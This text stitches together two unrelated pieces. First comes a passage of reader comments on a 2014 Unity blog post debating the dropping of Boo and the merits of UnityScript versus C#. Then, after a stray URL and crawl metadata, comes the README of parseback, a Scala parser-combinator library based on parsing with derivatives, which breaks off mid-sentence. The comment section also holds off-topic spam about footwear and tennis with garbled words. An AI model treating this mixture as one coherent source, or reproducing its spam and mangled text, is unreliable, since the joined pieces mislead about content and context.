citizen is in my opinion more honest in reflecting that. ChrisSeptember 3, 2014 at 9:53 pm I converted my project from Unityscript to C# and haven’t looked back. Apologies for the shameless plug, but for anyone interested, the converter I created to do this is available on the Asset Store:. …It goes as far as I think you can to make conversion of a complete, live project as simple as possible. Richard FineSeptember 3, 2014 at 9:46 pm @NIKKO: “C# is Microsoft and they have not yet published in public domain.” Uh, yes they did, from C# 1.0 – as ECMA-334, the same standards body that Javascript is published with. NikkoSeptember 3, 2014 at 8:40 pm Javascript is an open source language, independent form any corporate power, C# is Microsoft and they have not yet published in public domain. Microsoft has a long pattern at changing technology every 10 years, it is their business model. Remember Visual Basic, MFC, ASP, just to name a few. I would not rely on C# at all. C++ should be pushed as it is an universal language that everyone can learn at School and is not dependent on Microsoft business strategy… Richard FineSeptember 3, 2014 at 8:26 pm Yeah, I wouldn’t worry about UnityScript, it’s not going anywhere. And as people have noticed, while UnityScript is around, Boo will pretty much always continue to *work* as it’s what powers UnityScript on the back end… For people interested in the language converter tools, have you already seen things like ? Juan SebastianSeptember 3, 2014 at 8:08 pm funny thing is Unityscript compiler is made on Boo lol. Gabriel CesarSeptember 3, 2014 at 7:37 pm Why not trade for Boo Python? We would have more support from the developer community. ;) Andy MartinSeptember 3, 2014 at 7:09 pm It’s time for Boo to go. I’m a bit surprised though. At Unite, I heard several times how proud they were to support all 3 languages. There is no need to waste resources showing Boo documentation though. Christopher HagerSeptember 3, 2014 at 7:02 pm @Matthew Radford Don’t worry for a long while. They’re dropping Boo because less than a percent of Unity3D users use it. JavaScript (or UnityScript as I just learned. Yay, I’m still a bit of a newbie) has a good following of 20%, or 1 out of every 5 developers. Dropping JavaScript now (or in the near future) would be a lost for the company. I personally use C# (cause that’s the one I know how to use… to an extent) and am glad that they’re refocusing their setups to C#. But it would also be nice if they provided the UnityScript for every C# script they will display. That way I can better see the difference between the two languages for myself. And I’m not saying C# is better. It’s just the one I know the best. StephenOctober 10, 2014 at 3:10 am Hmmm, let methink about this one. From the rlubbe of our everyday lives we feel so much perceived pain, darkness and loss, Debts of feelings and the decline of our beliefs. But in that rlubbe a little broken heart still holds out hope and yearns for the freedom of peace and unity once again. The little vine proves that even broken souls can be repaired and look forward to a wonderful future where all is forgiven and life begings again. TeresitaOctober 11, 2014 at 10:38 am Even so, when being attentive to your paoernsl shoe’s whole jogging mile, additionally you have to take into account your fat. Sportsmen which are incredibly huge must change their sneakers prior to the particular gentle and transportable joggers. As an option to transforming their footwear each and every Eight months (when functioning 3 days for each week), they have to cut it two-months quicker. However, light-weight joggers can easily expand the lifestyle with their shoes for any few weeks. Expert tennis gamer, Carolyn Wozniacki becomes mind with her excellent tennis video games perform but her dress design and also Adidas tennis shoes possess caught the eye and thought linked with soccer fans from around the entire world. Wozniacki could be the regarded attract pertaining to Adidas’ Stella adidas design. The sports activities range for girls moyen aesthetics and luxury to further improve operation amount. The attractive designs you should not compromise superior take part in Caroline Wozniacki emanates from Denmark and her WTA introduction within 2005. Adams ImmersiveSeptember 3, 2014 at 7:00 pm As long as UnityScript stays around (given that it’s most similar to the non-Unity JavaScript web coding I do) I’m happy! I’d like to see more UnityScript examples added as well: some pages have no example at all. Alberto FonsecaSeptember 3, 2014 at 6:44 pm This is great news and I’m glad to see the use of analytics to direct resources to areas where they’ll have the most impact for users. I for one would love to see the C# docs contain more examples across the board so this is great. AdamSeptember 3, 2014 at 6:37 pm The differences between Unity’s “JavaScript” (UnityScript) and C# are very very small. Most code can be shared unaltered between the two languages. I agree with Robert that one can learn the differences between UnityScript (US) and C# in an afternoon, and it will be second nature before the week is out. Having cut my teeth with Unity using Unity’s JS (and coding in Unitron!), then moving to C# to be more compatible with 3rd party add-on’s like EZGui, the transition was very easy. To people with a background in the real JS, C# may seem intimidating, and the apparent similarities of syntax between JS and US may be comforting, but they mask the fact that US is pretty much C# in JS clothing. I think it’s a great thing that we can still code in C#, US & Boo, I think it makes sense for Unity Technologies to concentrate on just one language, and I’m on the +1 wagon to officially change the name of the language to UnityScript. Matthew RadfordSeptember 3, 2014 at 6:26 pm Oh man… I’m a bit concerned Javascript is going to be removed.. I’ve grown quite fond of it. I think one if the best Features for me about Unity Script is how simple it is. I’m always talking to other unity users I hang out with and they seem to be constantly trying to figure how to do THIS or THAT in C#. Using Unity Script I don’t think I’ve ever once thought about the language, only the API. Please don’t switch to C++ for everything like Unreal. Sure the graphics guys need it, but the rest of us don’t. Phil WinkelSeptember 3, 2014 at 6:09 pm unity script is just annoying, unless you’re doing your entire project in unity script. If you try to mix unity script with C# you run into all these ridiculous issues with order of compilation, trying to reference unity script stuff in C#, etc. Plus, like mentioned above, it’s often referred to as javascript when it’s not even really javascript. I think it should probably just be referred to as unity script across the board. Should probably just transition to C# and focus 100% of resources on that. If you can automatically generate UnityScript from C# that’s great. Don’t waste any time on UnityScript though. It’s more beneficial to learn C# (a real programming language you can do other development with) than to learn UnityScript, some weird version of javascript that you can only use for unity development. Down with UnityScript! Robert CummingsSeptember 3, 2014 at 5:29 pm Considering JS requires Boo internally, this is just a surface change. People can still write in js and boo, but the long term future should be that they are removed and people can just plug in a language of choice for example Lua bindings or such. The core of Unity should be just pure c# and hopefully (C++). This means everyone wins, especially since Unity wouldn’t have to burn resources on a tiny minority. Oh, and learning C# from JS takes about a day, if just sticking with what js can do. No excuses, it is time, and it’s happening. Start the migration today and you’ll get an internet’s worth of C# code and resources you can use. gakakiSeptember 3, 2014 at 5:09 pm i like javascript (but not static type javascript in unity ) and lua , because they are simple and can be hot updated Anthony MaddenSeptember 3, 2014 at 4:42 pm I really hope you guys don’t get rid of unityscript. All of my games I’ve released are in US and it would suck to have to start scripting in C#. I do know how to script in C# but its soooooo much faster to prototype using unityscript. martySeptember 3, 2014 at 4:24 pm Any chance those C#->US and US->C# conversion tools will ever be shared with the community? DallonFSeptember 3, 2014 at 3:59 pm Suggestion: please change all instances of “JavaScript” in the editor and and documentation to “UnityScript”. The true JavaScript language is evolving and the distinction between modern JavaScript and UnityScript is becoming increasingly prominent. Plus it would help reduce the confused newbies on the forums who bought a Java book hoping to learn Unity scripting. Frederico ZveiterSeptember 3, 2014 at 3:40 pm Fair enough. ColbySeptember 3, 2014 at 3:23 pm Makes sense to me. I was kinda figuring it was only a matter of time til boo was dropped. Awesome about C# and I friggen can’t wait for Unity 5! Wilson KoderSeptember 3, 2014 at 3:17 pm Will the C#-UnityScript converter be available to the public? And I have to do this, first! aleksandrSeptember 4, 2014 at 12:20 pm Thank for your feedback. There is currently no plan to make the C#=>US converter public.
https://blogs.unity3d.com/2014/09/03/documentation-unity-scripting-languages-and-you/
CC-MAIN-2019-22
refinedweb
6,819
69.62
Please help - JSF newbie question on user authentication I am working on an online tutorial where in my POJO I am trying to acquire the userID value to display on my webpage. I am working in Eclipse and I put a breakpoint in my bean but I never get there. Here is the code I'm using and any help/direction would be greatly appreciated: <br /> package org.texashealth.transfer.user;</p> <p>import javax.servlet.http.HttpServletRequest;<br /> import javax.faces.bean.*;</p> <p>@ManagedBean<br /> public class User {</p> <p> private String userID;</p> <p> public String getUserID() {<br /> return userID;<br /> }</p> <p> public void setUserID(String userID) {<br /> this.userID = userID;<br /> }</p> <p> public String authenticate(HttpServletRequest request) {<br /> userID = request.getRemoteUser().substring(6);<br /> return userID;<br /> }<br /> }<br /> In the JSP page I have the following: </p> <p>JSF Test Form</p> <p> Here is the userID: <br /> Some random data:<br /> Some other data: ]</p> <p> I also tried modifying my getUserID method above to use a FacesContext method but still got a NULL value: <br /> public String getUserID() {<br /> userID = FacesContext.getCurrentInstance().getExternalContext().getRemoteUser();<br /> return userID;<br /> Forgot to add additional code change made for other's info. Message was edited by: savoym I resolved my problem.
https://www.java.net/node/705085
CC-MAIN-2015-27
refinedweb
217
53.1
How to: Use the Load Test API This topic applies to: Visual Studio Ultimate supports load test plug-ins which can control or enhance a load test. Load test plug-ins are user defined classes which implement the ILoadTestPlugin interface found in the Microsoft.VisualStudio.TestTools.LoadTesting namespace. Load test plug-ins allow for custom load test control, such as, aborting a load test when a counter or error threshold is met. Use the properties on the LoadTest class to get or set load test parameters from user defined code. Use the events on the LoadTest class to attach delegates for notifications when the load test is running. You can also create plug-ins for Web performance tests. For more information, see How to: Create a Web Performance Test Plug-In and How to: Create a Request-Level Plug-In. To use the LoadTesting namespace Open a Test Project that contains a load test. For more information, see Creating and Editing Load Tests. Add a Visual C# or a Visual Basic class library project to your test solution. Add a reference in the test project to the class library project. Add a reference to the Microsoft.VisualStudio.QualityTools.LoadTestFramework dll in the Class Library project. In the class file located in the class library project, add a using statement for the Microsoft.VisualStudio.TestTools.LoadTesting namespace. Create a public class that implements the ILoadTestPlugin interface. Build the project. Add the new load test plug-in using the Load Test Editor: Right-click the root node of the load test and then click Add Load Test Plug-in. The Add Load Test Plug-in dialog box is displayed. In the Properties for selected plug-in pane, set the initial values for the plug-in to use at run time. Run your Load test. For an implementation of ILoadTestPlugin, see How to: Create a Load Test Plug-In.
https://msdn.microsoft.com/en-us/library/ms182605(v=vs.100).aspx
CC-MAIN-2015-22
refinedweb
316
57.27
If you have ever worked on an Object Detection, Instance Segmentation, or Semantic Segmentation tasks, you might have heard of the popular mean Average Precision (mAP) Machine Learning (ML) metric. On this page, we will: Сover the logic behind the metric; Find out how to interpret the metric’s value; Present a simple mean Average Precision calculation example; And see how to work with mAP using Python. Let’s jump in. To define the term, mean Average Precision (or mAP) is a Machine Learning metric designed to evaluate the Object Detection algorithms. To clarify, nowadays, you can use mAP to evaluate Instance and Semantic Segmentation models as well. Still, we will not talk much about these use cases on this page as we will focus on mean Average Precision for Object Detection tasks. From the mathematical standpoint, computing mAP requires summing up the Average Precision scores across all the classes and dividing the result by the total number of classes. Still, it is not that easy. In Object Detection-related papers, you can face such abbreviations as [email protected] or [email protected]. In short, this notation depicts the IoU threshold used to calculate mAP. Let’s check out how it works. If we set the IoU threshold at 0.9, then Precision is equal to 16% as only 1 out of 6 predictions fits the score; If the threshold is 0.71, then Precision is 66,67% because 4 predictions are above that score. And if the threshold is 0.3, then Precision rises to 100% as all the predictions have IoU above 0.3! So, the IoU threshold can significantly affect the final mean Average Precision value. This dependency introduces variability to a model evaluation. This is bad because there can be a scenario when one model performs well under one IoU threshold and massively underperforms under another. Data Scientists identified this weakness. They wanted the evaluation metric to be as robust as possible. So, they suggested measuring Average Precision for every class and every IoU threshold first and then calculating the average of the obtained scores. The picture above shows Precision-Recall curves drawn for 4 IoU thresholds for three different classes. In the example, the IoU threshold of 0.9 is the most stringent (as at least 90% overlap between the predicted and ground truth bounding boxes is required), and 0.6 is the most lenient. As you can see, the difference between each IoU threshold value is 0.1. This measure is called a step. So, the abbreviation [email protected]:0.1:0.9 means that the mAP was calculated for each IoU threshold in the range [0.6, 0.7, 0.8, 0.9] and each class. Then the obtained values were averaged to get the final result. Noteworthy, in the popular Common Objects in Context (COCO) dataset, mAP is benchmarked by averaging it out over IoUs from [0.5, 0.95] in 0.05 steps. Define the IoU thresholds; Compute the Average Precision score for each IoU threshold for a specific class; Calculate the mean Average Precision value for the given class by summing up the scores from step 2 and dividing them by the number of IoU threshold values; Apply steps 2 and 3 to all the classes; Sum up the obtained mAP scores and divide them by the total number of classes to get the final result. Since mAP is calculated across multiple Precision-Recall curves, the best case scenario you can get is when both precision and recall metrics on every IoU threshold are equal to their best possible value – one. However, such a case is a fantasy, so you should stay realistic and expect a significantly lower metric value. Noteworthy, it is complicated to provide unified mAP benchmarks that would suit any Object Detection problem since there are too many variables to consider, for instance: the number of classes; the expected tradeoff between Precision and Recall; the IoU threshold, etc. The truth is that based on the task, the same metric value might be both good and bad. So, if you spend some time identifying the desired value for your case and estimating your goals and resources, it would benefit you greatly. Nevertheless, the SOTA (State-of-the-Art) mAP for the Object Detection task on the COCO dataset's test part is currently 63,1. As you can see, SOTA is relatively low. Still, it does not mean you should stop if you see a value similar to it in your task. From our experience and the research conducted when writing this page, if your task does not include millions of classes and your IoU threshold is set to 0,5, you should reach at least 0,7 mAP before you are more or less satisfied with the model's performance. To summarize, if your Object Detection task is not similar to COCO, you should not bother that much about SOTA and try to achieve 0,8 mAP on the 0,5 IoU threshold before calling the job done. Also, do not trust the metric alone and always visualize the model's predictions to ensure your solution works as intended. For this page, we decided to be more advanced and prepared a Google Colab notebook featuring calculating mAP using Python on a simple example. We used the Average Precision and mean Average Precision formal formulas, NumPy and Sklearn functionalities, and some imagination. If you want a well-commented yet simple example of computing mean Average Precision in Python, check out this example. The mean Average Precision score is widely used in the industry, so the Machine and Deep Learning libraries either have their implementation of this metric or can be used to code it quickly. For this page, we prepared three code blocks featuring calculating mAP in Python. In detail, you can check out: mean Average Precision in NumPy; mean Average Precision in TensorFlow; mean Average Precision in PyTorch. import numpy as np def apk(actual, predicted, k=10): #This function computes the average prescision at k between two lists of items. if not actual: return 0.0 return score / min(len(actual), k) def mapk(actual, predicted, k=10): #This function computes the mean average precision at k between two lists of lists of items. return np.mean([apk(a,p,k) for a,p in zip(actual, predicted)]) !pip install tensorflow==1.15 #Make sure you have updated the Tensorflow version for tf.metrics.average_precision_at_k to work import tensorflow as tf import numpy as np y_true = np.array([[2], [1], [0], [3], [0]]).astype(np.int64) y_true = tf.identity(y_true) y_pred = np.array([[0.1, 0.2, 0.6, 0.1], [0.8, 0.05, 0.1, 0.05], [0.3, 0.4, 0.1, 0.2], [0.6, 0.25, 0.1, 0.05], [0.1, 0.2, 0.6, 0.1] ]).astype(np.float32) y_pred = tf.identity(y_pred) m_ap = tf.metrics.average_precision_at_k(y_true, y_pred, 3) sess = tf.Session() sess.run(tf.local_variables_initializer()) stream_vars = [i for i in tf.local_variables()] tf_map = sess.run(m_ap) print(tf_map) print((sess.run(stream_vars))) tmp_rank = tf.nn.top_k(y_pred,3) print(sess.run(tmp_rank)) import torch from torchmetrics.detection.mean_ap import MeanAveragePrecision preds = [ dict( boxes=torch.tensor([[258.0, 41.0, 606.0, 285.0]]), scores=torch.tensor([0.536]), labels=torch.tensor([0]), ) ] target = [ dict( boxes=torch.tensor([[214.0, 41.0, 562.0, 285.0]]), labels=torch.tensor([0]), ) ] metric = MeanAveragePrecision() metric.update(preds, target) from pprint import pprint pprint(metric.compute()) Hasty is a unified agile ML platform for your entire Vision AI pipeline — with minimal integration effort for you.
https://hasty.ai/docs/mp-wiki/metrics/map-mean-average-precision
CC-MAIN-2022-40
refinedweb
1,273
56.15
derelict-cuda 3.1.1 A dynamic binding to the CUDA API. To use this package, run the following command in your project's root directory: Manual usage Put the following dependency into your project's dependences section: DerelictCUDA A dynamic binding to [CUDA][1] for the D Programming Language. Only the Driver and Runtime API are provided for now. Please see the pages Building and Linking Derelict and Using Derelict, in the Derelict documentation, for information on how to build DerelictCUDA and load the CUDA library at run time. In the meantime, here's some sample code. import derelict.cuda; void main() { DerelictCUDADriver.load(); // Now CUDA Driver API functions can be called. // Alternatively: DerelictCUDARuntime.load(); // Now CUDA Runtime API functions can be called. Driver and Runtime API are exclusive. ... } [1] - Registered by ponce - 3.1.1 released 5 years ago - DerelictOrg/DerelictCUDA - github.com/DerelictOrg/DerelictCUDA - Boost - Authors: - - Dependencies: - derelict-util - Versions: - Show all 9 versions - Download Stats: 0 downloads today 2 downloads this week 7 downloads this month 1226 downloads total - Score: - 1.9 - Short URL: - derelict-cuda.dub.pm
https://code.dlang.org/packages/derelict-cuda
CC-MAIN-2022-05
refinedweb
182
50.43
Parsing with derivatives may be viewed as a form of breadth-first recursive descent. Breadth-first search is orthogonal to depth-first search, and two lines which are orthogonal in two-dimensional Euclidean space may also be said to be perpendicular. Thus, an appropriate name for this library might be "parsper", as a shortening of "parse perpendicular". Such a name is eminently googleable and implies a wealth of potential Star Trek puns. Unfortunately, it looks far too much like a typo. Thus, "parseback" serves both as a faux shortening of "parse backwards" and a reference to "logback", for no particular reason. Parseback is a Scala implementation of parsing with derivatives (Might, Darais, Spiewak; 2011) taking into account the significant refinements of described by Adams, Hollenbeck and Might. It is designed to be an idiomatic, convenient and safe parser combinator library for formal general context-free grammars with production-viable performance. - Usage - Motivation - Performance - Example - DSL Reference - Forks and Releases - Contributing and Legal UsageUsage resolvers += "bintray-djspiewak-maven" at "" val ParsebackVersion = "0.3" libraryDependencies += "com.codecommit" %% "parseback-core" % ParsebackVersion libraryDependencies += "com.codecommit" %% "parseback-cats" % ParsebackVersion // or! libraryDependencies += "com.codecommit" %% "parseback-scalaz-72" % ParsebackVersion // or! libraryDependencies += "com.codecommit" %% "parseback-scalaz-71" % ParsebackVersion The current, "stable" version of parseback is 0.3. Cross builds are available for Scala 2.12 and 2.11. All stable, numbered releases are signed with my key. Snapshots are intermittently available. All snapshots are of the form [version]-[hash], where [version] is the compatible base version (i.e. the stable version with which the snapshot is compatible). If that base version is unreleased (i.e. a future release), then full compatibility with the ultimate release is not necessarily guaranteed. [hash] is a seven character prefix of the Git hash from which the snapshot release was made. Feel free to make snapshots of your own!. MotivationMotivation There are two important things that need to be motivated: - Generalized parsing - Parseback as an implementation thereof If you don't believe that generalized parsing (i.e. a parsing algorithm which can handle the complete space of formal context-free grammars) is necessary, then parseback is a considerably over-complicated solution. It still provides some nice features (many of which are a consequence of generalized parsing!), but there are simpler and faster algorithms which can achieve the goal. That is, if the goal is parsing something less than the full space of context-free grammars. Generalized ParsingGeneralized Parsing Context-Free Grammars, or CFGs, have several very nice properties as a formalism. Notably, they: - Are closed under union - Are closed under sequence - Maintain identity under identity transformations All of these points deserve closer examination. Closure under union and sequence literally says that if you have two CFGs, G and H, then G | H and G ~ H are both also CFGs (using parseback notation). That is, the union of G and H is a CFG (where G and H are CFGs), and the sequentialization (this followed by that) of G and H is also a CFG. We take this property so much for granted when it comes to regular expressions (where it also holds) that it doesn't seem particularly revelatory, but most parsing algorithms do not allow for this. Most parsing algorithms do not accept the full set of context-free grammars. That is, there is a set of CFGs – in the case of some algorithms, a very large and useful set! – which will either be rejected by the parsing algorithm, or which will produce invalid results. Invalid results may range from accepting/rejecting inputs erroneously, to simply crashing on certain inputs. The subsets of CFGs which are accepted vary from algorithm to algorithm, but some common ones include: - CNF - LL(1) - LL(k) - LALR(1) - PEG (not actually a subset of CFG; see below) Factoring a grammar to fit into the particular rule set accepted by the parsing algorithm at hand can be very non-trivial. Mechanical transformations are possible in many cases, but tooling is seldom available which implement these theoretical algorithms. More often than not, we're stuck reading a BISON "shift/reduce conflict" error, wondering what juggling we need to perform in order to bring things up to par. Identity transformations are the third property which is lost when general CFGs are not accepted by a parsing algorithm. And this is, quite simply, the parsing analogue of referential transparency. For example: E := '(' E ')' | '(' E ']' | epsilon The above is a BNF (Backus–Naur form) grammar which matches the string any number of balanced bracket or parentheses operators, with the odd twist that brackets may close parentheses. For example: (((((((((((])))])]]))) is a valid string in the language defined by this grammar. Now, you probably noticed the immediate redundancy across two of the reductions of the E non-terminal. It seems intuitive that we should be able to extract out that redundancy into a separate, shared non-terminal. Always DRY, right? T ::= '(' E E := T ')' | T ']' | epsilon Unfortunately, this is no longer valid according to some parsing algorithms! We have made a straightforward refactoring to the grammar which, according to the rules of CFG construction, should not have affected the language we match. However, in some algorithms, it would have. This is not an issue for generalized parsers such as parseback. So generalized CFGs, as opposed to the limited variants supported by most parsing algorithms, give us a parsing analogue of referential transparency, and they give us closure under composition. Again, closure under composition means that we can always compose two grammars, either via union or sequence, and the result is a grammar. Put another way: with a generalized parsing algorithm, all combinators are total; with a non-generalized parsing algorithm, composition is partial and may fail on certain values. Why Parseback?Why Parseback? So if generalized parsing is so great, why not use one of the more mature implementations? Well, for starters, there aren't too many truly mature generalized parsing implementations. BISON has a "GLR mode", which is depressing and weird because it doesn't actually implement GLR. There are a few well-polished research tools, notably SGLR, which is rather inapproachable for non-research use. To my knowledge (which is far from exhaustive!), there are only two other parser combinator implementations of a cubic time (current best-known bounds) generalized parsing algorithm in any language, and those are gll-combinators and Early. Earley is a Haskell library, which rules it out if you're on the JVM (for now). gll-combinators is pretty neat, and it's seen production use on several projects over the years, but it has some significant warts. Namely, the algorithm is enormously more complex than PWD (Parsing With Derivatives), which makes maintenance and bug fixing much much harder in practice. Second, the constant-time performance factors are very high. They could be brought down considerably with more optimization work, but private correspondence with other research groups working on GLL suggests that the algorithm itself may simply be inherently less efficient than other generalized parsing algorithms due to the state which has to be threaded through the main dispatch loop. Outside of gll-combinators and research tools like SGLR, there really isn't much that implements generalized parsing. So if you're sold on the idea of total composability and referential transparency, parseback is probably your best bet. Fortunately, we don't have to only point to practical-monopoly as a reason to use parseback. Other useful features that are implemented or planned to be implemented: - Scannerless (in practice, scannerless parsing all-but requires generalized CFGs due to eagerness) - Line tracking (basically required if you're implementing a compiler) - Disambiguation filters (in the style of SGLR, for declarative precedence/associativity) - Negation classes (also from SGLR, used for identifiers as distinct from keywords) - Error recovery (in the style of BISON; open research here) - Incremental, resource-safe input consumption threaded through an arbitrary monad - Clean Scala syntax and type inference Ever wanted to pass an arity-3 lambda as a reduction rule for a Scala parser combinator instance of the form a ~ b ~ c and get full type inference? Scala's parser combinators cannot do this. Parseback can. Why Not PEG / Packrat / Parser Combinators?Why Not PEG / Packrat / Parser Combinators? Since the terms are not particularly well known, let's take a second to agree on what "PEG" and "Packrat" are. Parsing Expression Grammars, or PEGs, is a declarative format, analogous to BNF, which defines a grammar-like construct that will be accepted by a recursive-descent style parsing algorithm with infinite backtracking. It consists of two primary composition operators: sequence, and ordered choice. It does not contain a union operation, though ordered choice is somewhat reminiscent of union and may be used to encode similar grammatical semantics. PEGs as a construction and as a parsing algorithm have gained considerable traction over the last decade, due in part to the subjectively intuitive properties of the ordered choice operation for disambiguation (it "tries" the first branch first), and also because of the ease with which the underlying algorithm may be implemented. The parsing algorithm itself is exponential in the worst case (a recursively ambiguous grammar applied to input which it will reject), but is generally polynomial (with a moderately high exponent) on most inputs. It does not admit left-recursive grammars, and "ambiguous" grammars will produce only a single result (due to the ordered choice). Packrat parsing improves on PEG parsing through memoization, using a set of techniques very similar to those which are employed within PWD. Packrat parsers are specified by PEGs, with the added benefit of admitting most left-recursive grammars, but not grammars with indirect left-recursion. Packrat parsing is quadratic in the worst case, and generally somewhere between linear and quadratic on most inputs. The memoization is quite tricky to implement, but nothing worse than PWD. Parser combinators are familiar to anyone doing functional programming, and they literally implement PEG parsing. The progression of parser combinator frameworks has more or less mirrored and borrowed-from the progression of PEG parsers, and most widely-used practical parser combinator frameworks are now implemented using some variant of Packrat parsing. This includes Scala's standard library parser combinators. So, if these tools are so popular, why not use them? My answer is simply that PEG parsing, as a fundamental tool, is broken. Ordered choice seems very intuitive and pleasing when you first use it, but it becomes progressively harder and harder to encode expected semantics into a grammar. A very common example of this is encoding equal precedence for the + and - binary operators in an expression grammar. PEG parsing has no really good way of doing this. And as your grammar gets more complicated and your disambiguation semantics become progressively more situational, you end up contorting your PEG expressions quite considerably just to get the ordering you need. Your PEG "grammar" starts acting a lot more like an imperative program with slightly odd syntax, rather than a truly declarative abstraction. One of parseback's fundamental guiding principles is that everything about parser construction should be declarative. The grammar should specify the language precisely, and without imperative flow. Disambiguation rules and negation classes should be similarly declarative, and uncluttered from the formal semantics of the CFG itself as they are, in fact, a function of tree construction. Semantic actions (reductions) should be pure functions without a need for separate state tracking. All of these things have been found to be enormously valuable properties in practice (based on experience with tools like SGLR and gll-combinators). Parseback's goal is to bring these properties to Scala together with high performance and a clean, idiomatic API. PerformancePerformance About that performance... Until we measure things, this is all just educated guesswork, loosely informed by the Adams, Hollenbeck, Might paper. And until we finish laying down the fundamental algorithmic work, performance measurements are disingenuous. However, it's not hard to prognosticate what is likely realistic, given what is known about the PWD algorithm, its implementations, and the JVM in general. PWD is a worst-case cubic time algorithm. That means its worst-case asymptotic performance is an order of magnitude worse than Packrat parsing (worst-case quadratic). However, that worst-case appears to be quite infrequent in practice. If you're accustomed to analyzing generalized parsing algorithms, it is pedagogically interesting to note that this worst case is not an out-growth of recursively ambiguous unions, but rather recursively interleaved alternation of sequentials. PWD appears to be somewhat unique in that regard. At any rate, it's not very common sort of construction in practice. In practice, PWD's algorithmic complexity should be roughly linear, with some parse trails producing quadratic behavior on subsets of the input. Experiments with various PWD implementations have shown that the inherent constant factors are very low. Adams, Hollenbeck and Might found that the performance of their Racket implementation was within a few factors of BISON on raw C. Even approaching that kind of performance is quite impressive, given the overhead of Racket's runtime. Given that Parseback is being implemented on the JVM, I would expect the performance can be made to be very good. I don't expect to beat BISON, but I do expect we'll be able to see roughly the same tier of performance that the Racket implementation achieved. Or at the very least, I see absolutely no reason why we shouldn't see that tier of performance. The algorithm is very straightforward. The biggest concern is the number of allocations required, which is generally something the JVM doesn't handle as well as other runtimes. Assuming we can achieve the performance that I believe is a realistic ceiling for this algorithm and API on the JVM, parseback should be pretty dramatically faster than Scala's standard library parser combinators. I expect that parseback will remain slower than some heavily-optimized and specialized parsing frameworks such as Parboiled, but such frameworks are designed for a very different use-case (i.e. not language construction). Pre-compiled tools like ANTLR and (especially!) Beaver will remain the gold standard for parser performance on the JVM, but my goal is to bring parseback's runtime performance close enough to these tools that it becomes a real, viable alternative, but (obviously) within the form of an embedded DSL with a pleasant API. ExampleExample This section will assume the following imports: import parseback._ import parseback.compat.cats._ If you're using scalaz, you should replace cats with scalaz, as well as make other alterations below to the cats-specific types (e.g. replace Eval with Need). A time-honored example of parsers is the expression grammar, and who are we to argue with tradition! The following parser reads and evaluates simple arithmetic expressions over integers: Direct GrammarDirect Grammar implicit val W = Whitespace("""\s+"""r) lazy val expr: Parser[Int] = ( expr ~ "+" ~ term ^^ { (_, e, _, t) => e + t } | expr ~ "-" ~ term ^^ { (_, e, _, t) => e - t } | term ) lazy val term: Parser[Int] = ( term ~ "*" ~ factor ^^ { (_, e, _, f) => e * f } | term ~ "/" ~ factor ^^ { (_, e, _, f) => e / f } | factor ) lazy val factor: Parser[Int] = ( "(" ~> expr <~ ")" | "-" ~ expr ^^ { (_, _, e) => -e } | """\d+""".r ^^ { (_, str) => str.toInt } ) The first thing that you should notice is that this looks very similar to the expression grammar example given on Wikipedia. In fact, the grammar is identical save for three features: - Negation - Integer literals - Precedence and associativity The Wikipedia article on CFGs actually specifically calls out the precedence and associativity question, where as we are presciently side-stepping it for the time being. As for negation and integers, it just seemed like a more interesting example if I included them. At any rate, this should give a general feel for how parseback's DSL works that should be familiar to anyone who has used a parser generator tool (such as BISON) in the past. Values of type Parser represent grammar fragments – generally non-terminals – and can be composed either via the ~ operator (sequentially) or via the | operator (alternation). It is idiomatic to vertically align definitions by the | operator, so as to mimic the conventional structure of a BNF grammar. Remember, this is a declarative definition of the underlying grammar. The first bit of weirdness you should notice as a user of Scala is that all of these parsers are declared as lazy val. This is extremely important. The Scala compiler would not complain if we used def here, but the algorithm wouldn't provide the same guarantees. In fact, if you use def instead of lazy val, the PWD algorithm becomes exponential instead of cubic! This is because def defeats memoization by creating an infinite lazy tree. This is different from lazy val, which represents the cyclic graph directly. Packrat parsing frameworks have a similar restriction. There are a few more symbols to unpack here before we move on to how we actually use this tool. First, the mysterious ^^ operator which apparently takes a lambda as its parameter. This operator is effectively the map operation on Parser. Note that Parser does define a map which obeys the functor laws and which has a slightly different signature. Specifically, it does not provide line tracking (a feature we'll cover in a bit). Symbolic operators, and especially the ^^ operator, have better precedence interactions with the rest of the DSL and are generally quite lightweight, which is why we're using ^^ here instead of an English name in the DSL. The meaning of the ^^ operator is the same as map though: take the Parser to the left and "unpack" it, applying the given function to its result and return a new Parser which will produce the returned value. In standard parser generator terms, ^^ denotes a semantic action, or "reduction". The action itself is given by the lambda which is passed to ^^. This lambda will take the following parameters: - The line(s) which were parsed to produce the results - The first result in a sequential composition - The second result in a sequential composition - etc… Thus, if you apply ^^ to a Parser created from a single rule (such as the very last rule in factor), its lambda will take two parameters: one for the line, and one for the result. If you apply ^^ to a Parser created from the composition of two rules (such as the negation rule in factor), it will take three parameters: one for the line, and one for each of the results. If you apply ^^ to a Parser created from the composition of three rules (such as any of the actions in expr or term), it will take four parameters: one for the line, and one for each of the results. In the cases of the expr and term reductions, as well as the negation rule in factor, we don't care about the results from the syntax operators (e.g. "*", "-", and so on), since these are trivial. What we care about are the results from the expr, term and factor parsers. These are captured in the relevant function parameters, and then used in the computation. Sharp-eyed readers will realize that the following grammar production is a bit different than the others: "(" ~> expr <~ ")". Specifically, this is using the ~> and <~ operators. These operators behave exactly the same as the ~ operator – sequential composition of two parsers – except they only preserve the result in the direction of the "arrow". Parentheses are a mixfix operator which only matters for grouping purposes and does not affect the result of the expression. Thus, the results obtained by computing the value of an expression wrapped in parentheses is simply the value of the expression within the parentheses, unmodified. We could have equivalently written this production in the following way: "(" ~> expr <~ ")" // is equivalent to! "(" ~ expr ~ ")" ^^ { (_, _, e, _) => e } Obviously, the former is quite a bit more concise than the latter. You should decide on a case-by-case basis whether or not it is worth using the ~> or <~ operators in your grammars. For example, you'll notice I didn't use them in the negation operation, despite the fact that the result of the "-" parser is meaningless. Whether or not you use the "arrow" operators rather than plain-old sequential composition ( ~) is up to you, but I will say from experience that over-use of these operators can make it very difficult to read a grammar. Sometimes, the simpler tools are best. One final note: that mysterious implicit val W = Whitespace(...) thing that we put at the very top. This is clearly not part of the grammar. What we're actually doing here is configuring the behavior of the scannerless tokenizer within parseback. Parseback does implement scannerless parsing, as you probably inferred from the "bare" regular expression within the factor non-terminal, but doing so requires a bit of configuration in order to avoid assuming things about your language. Specifically, you must tell parseback exactly what characters count as whitespace and thus can be ignored leading and trailing tokens. This is important, since some languages have significant whitespace! By default, parseback will not assume any whitespace semantics at all, and all characters will be parsed. We override this default by providing an implicit value of type Whitespace. This value must be in scope both at the grammar declaration site and at the point where we apply the grammar to an input (see below). Note that parseback's whitespace handling is currently extremely naive. The only whitespace regular expressions which will behave appropriately are of the form .+, where . 